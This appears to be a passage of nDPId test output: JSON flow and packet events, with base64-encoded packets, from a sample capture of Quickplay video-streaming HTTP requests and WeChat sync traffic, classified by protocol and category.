-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} -01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7440000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} 
-02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYx
MDNkNTU4OTU2YWQwYWY2YTU2Mw=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
-01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7440000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
-01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7440000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": 
{"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKk
AeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} -01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} -00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} 
-01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7440000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":380,"pkt_l4_len":344,"thread_ts_msec":1429000052348,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWw6SUAAPwb+3wo2qfrLzYFlpwkAUDA+6IKRcovGUBgAblluAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1iYXRjaGVtb2ppZG93bmxvYWQgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiA0OQ0KQ29udGVudC1UeXBlOiBhcHBsaW